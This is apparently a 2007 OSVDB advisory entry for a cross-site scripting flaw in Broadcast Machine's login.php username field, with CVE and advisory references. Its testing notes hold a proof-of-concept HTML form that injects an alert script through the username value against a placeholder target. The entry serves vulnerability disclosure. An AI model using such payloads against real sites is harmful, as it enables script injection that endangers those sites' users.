Broadcast Machine login.php username Variable XSS

2007-11-12T00:00:00
ID OSVDB:39735
Type osvdb
Reporter OSVDB
Modified 2007-11-12T00:00:00

Description

Manual Testing Notes

<formaction="http://[target]/login.php"method="post"><inputtype="text"name="username"value='"<script>alert(1)</script>'><inputtype="submit"></form>

References:

Vendor URL: http://www.getmiro.com/create/broadcast/ Other Advisory URL: http://www.int21.de/cve/CVE-2007-3694-bm.html Other Advisory URL: http://securityreason.com/securityalert/3363 Mail List Post: http://lists.grok.org.uk/pipermail/full-disclosure/2007-November/067486.html ISS X-Force ID: 38418 CVE-2007-3694 Bugtraq ID: 26407